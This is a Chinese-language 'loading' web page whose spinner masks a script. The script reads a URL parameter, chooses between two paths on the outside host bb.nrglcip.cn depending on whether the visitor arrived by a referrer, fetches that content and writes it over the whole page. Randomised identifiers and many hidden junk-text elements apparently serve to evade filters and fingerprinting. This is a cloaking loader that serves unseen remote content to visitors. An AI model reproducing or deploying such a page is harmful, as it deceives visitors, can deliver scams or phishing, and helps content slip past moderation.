<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .M6OOWy {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .M6OOWy .sWUaDj1Mv {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .M6OOWy .content {
            line-height: 50px;
            text-align: center
        }

        .M6OOWy .img {
            width: 100%
        }

        .M6OOWy .MvA6Itn04t1 {
            text-align: center
        }

        .M6OOWy .MvA6Itn04t1 span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .M6OOWy .MvA6Itn04t1 span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .M6OOWy .MvA6Itn04t1 span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .M6OOWy .MvA6Itn04t1 span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .M6OOWy .MvA6Itn04t1 span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .M6OOWy .MvA6Itn04t1 span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .M6OOWy .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function m2cCs9VsE4xgf(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var X64NCA = m2cCs9VsE4xgf('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ X64NCA +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ X64NCA +".html?a=share";
		}
		
        AgVQaH=url+"#"+new Date().getTime();
        AgVQaH && function() {
            $.get(AgVQaH, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<a  href='#' style='display:none'>VJsVFTbQU9UCIfmfop9mCwOq0FmTH9sxIPWPqYFGrV</a>
<ul style='display:none' >ozXRlSjjuk4quhpMWY4ywPnrmsBPrJGfBBjlpF</ul>
<li style='display:none' >yFTvfnJMjVoHrzOqMI6OZLp44kazKBdXdD8jGJYCa7cnu93KS3UZIwGUM26H5vsuFG13EjhIsv4J8pwdyDiUCKte</li>
<ul style='display:none' >ozXRlSjjuk4quhpMWY4ywPnrmsBPrJGfBBjlpF</ul>
<span style='display:none'>GlWQNH6hgrQDirFbEySKQ1bm3pQssUyinbLKLQ9bQj6BliYuKOICA8R5xtPnxD7mrJ3Na44fUAX0D3ddaiwztP</span>
<span style='display:none'>GlWQNH6hgrQDirFbEySKQ1bm3pQssUyinbLKLQ9bQj6BliYuKOICA8R5xtPnxD7mrJ3Na44fUAX0D3ddaiwztP</span>
<b style='display:none' >mKlUaYlScnFJaGL29U3ZFpepbYGRk0YbWhRntfFYtWnMZvF0dWdjFIOOZFgZ8VJTtTuZGivj8f</b>
<a  href='#' style='display:none'>VJsVFTbQU9UCIfmfop9mCwOq0FmTH9sxIPWPqYFGrV</a>
<h1 style='display:none' >JkjfxwzYHziY5gP6MEXvXKb8174HbIlUSDv3hCPPREPF194RanbLOZiUC6</h1><div class="M6OOWy">
    <div class="sWUaDj1Mv">
        <div class="MvA6Itn04t1">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<h1 style='display:none' >s3TQAKVbxGiZXgeX3f5IpXSZnsY5kDFYlTzXVBuzohK4iChXDcLKiOIZH93iCkTycKMP99fS3GWm5e4MxKdCDxnf3P8VXD7JpLST</h1>
<h1 style='display:none' >s3TQAKVbxGiZXgeX3f5IpXSZnsY5kDFYlTzXVBuzohK4iChXDcLKiOIZH93iCkTycKMP99fS3GWm5e4MxKdCDxnf3P8VXD7JpLST</h1>
<img  src='' style='display:none'>
<b style='display:none' >vOJ7CTdHsZWD2Gj2S5i2Y1mJ4fJFZyr55Wt32M9BPN9Wq7Dru6ZTj8Bx9u4axTXLSZGdsRIRWk5U02p7yIAn3mT1luhj</b></body>
</html>